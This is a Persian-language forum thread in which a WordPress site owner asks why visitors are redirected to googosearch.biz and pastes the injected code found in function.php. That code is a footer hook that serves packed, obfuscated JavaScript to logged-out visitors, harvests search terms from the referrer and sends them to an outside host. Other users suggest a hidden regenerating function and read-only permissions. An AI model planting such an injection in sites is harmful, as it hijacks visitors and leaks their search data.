• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

ریدایرکت شدن سایت در googosearch.biz

ctrl

Registered User
لایک‌ها
9
سلام دوستان
چند وقتی هست هنگام ورود به سایت به صورت خودکار به googosearch.biz ریدایرکت میشه

کدهای سایت رو نگاه کردم فهمیدم از کد زیره که در function.php وجو داره

کد:
<?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
			}
		}
	}
?>

من این کد رو پاک کردم اما دو روزه بعد دوباره ایجاد شد

کسی میدونه این کد چطوری ایجاد میشه؟

imehrdad

Registered User
لایک‌ها
190
شاید از اول بود تو فایلهای قالب و یه فانکشن دیگه داره که بعد از پاک شدن دوباره بسازه یادمه امیر هم یه تاپیک در این مورد زده بود
به هرحال پرمیشن فایل هاتون رو از حالت قابل نوشتن در بیارین تا تغییر پیدا نکنن

ctrl

Registered User
لایک‌ها
9
شاید از اول بود تو فایلهای قالب و یه فانکشن دیگه داره که بعد از پاک شدن دوباره بسازه یادمه امیر هم یه تاپیک در این مورد زده بود
به هرحال پرمیشن فایل هاتون رو از حالت قابل نوشتن در بیارین تا تغییر پیدا نکنن
نه از اول نبودش
مثل اینکه کاری دیگه ای نمیشه انجام داد
پرمیشن رو فعلا به 444 تغییر دادم

بالا